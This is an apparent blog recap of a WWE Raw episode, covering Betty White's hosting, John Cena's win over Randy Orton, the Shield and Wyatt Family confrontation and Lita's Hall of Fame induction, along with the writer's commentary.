Betty White was heavily publicized for Raw, but outside of a skit with the New Age Outlaws in which she pranked Billy Gunn, she didn’t do much of anything. What she did do is hit all her queues, read her lines perfectly, and was one of the most professional “hosts” they’ve had. This woman is 92 years old.
The show was centered around yet another John Cena vs. Randy Orton match.
John Cena beats Randy Orton
In what seems like their 1 millionth match together, John Cena beat Randy Orton in their normal match that heats up right near the finish. I was at a house show in San Jose over the weekend and that match might’ve been a tad bit better.
It was the culmination on the ongoing storyline in which Triple H and Stephanie are unhappy with Randy Orton as champion and are thinking about changing the face of the WWE. Orton tried apologizing before Daniel Bryan cut him off. Triple H and Stephanie weren’t happy with Bryan and Triple H said he wouldn’t be in a match on the show. Bryan started a no chant, but it didn’t matter.
Stephanie really needs to stop wearing heels since she’s taller than a majority of the roster when she does.
Bryan did do a run-in later in the show. Kane was being reprimanded for getting involved in the main event last week and decided to tell the world in the center of the ring on the mic. Bryan came out and ran Kane off to the crowd chantings of “Yes!”
Lita is in the 2014 class of the WWE Hall of Fame.
On the heels of Trish Stratus going in last year, Lita is going in this year. It’s a smart choice as she is a remnant from the attitude era and is simply a memorable character. Let’s just hope AJ doesn’t induct her.

The Shield and Wyatts nearly face off.
The Wyatts beat Rey Mysterio and the Rhodes brothers after Bray pinned Rey Rey. Bray cut a promo on the Shield.
In a weird interview, Roman Reigns called out Dean Ambrose for not defending his US title. In a sense, he’s becoming the Batista of the group, except there’s no Triple H. I guess that’s Dean. Ambrose put out an open challenge for the title.
Mark Henry answered the challenge and hit Ambrose with the World’s Strongest Slam, but his pin was broken up by Seth Rollins. Reigns also speared him. Enter the Wyatts. They made their way to ringside, and Bray and Roman looked to be on a collision course, but the Wyatts stepped away. This was built well.
Other tidbits
– Sheamus and Christian beat the Real Americans after Swagger ate the Brogue Kick.
– Alberto Del Rio beat Dolph Ziggler and put the arm bar on him after the match was over. Batista saved Ziggler and powerbombed Del Rio onto the announcer’s table. Batista’s return hasn’t quite been booked explosively. Triple H told Big Dave after that he can’t do stuff like that because they’re a publicly traded company now. I think they have been for Batista’s entire career.
– The Usos look to be the number one contender. They beat Ryback and Curtis Axel. Axel looked so much better at the house show.
The show was easy to watch, but it still feels like it’s lacking importance outside of the Shield and Wyatts. There’s not that many of these left until WrestleMania.
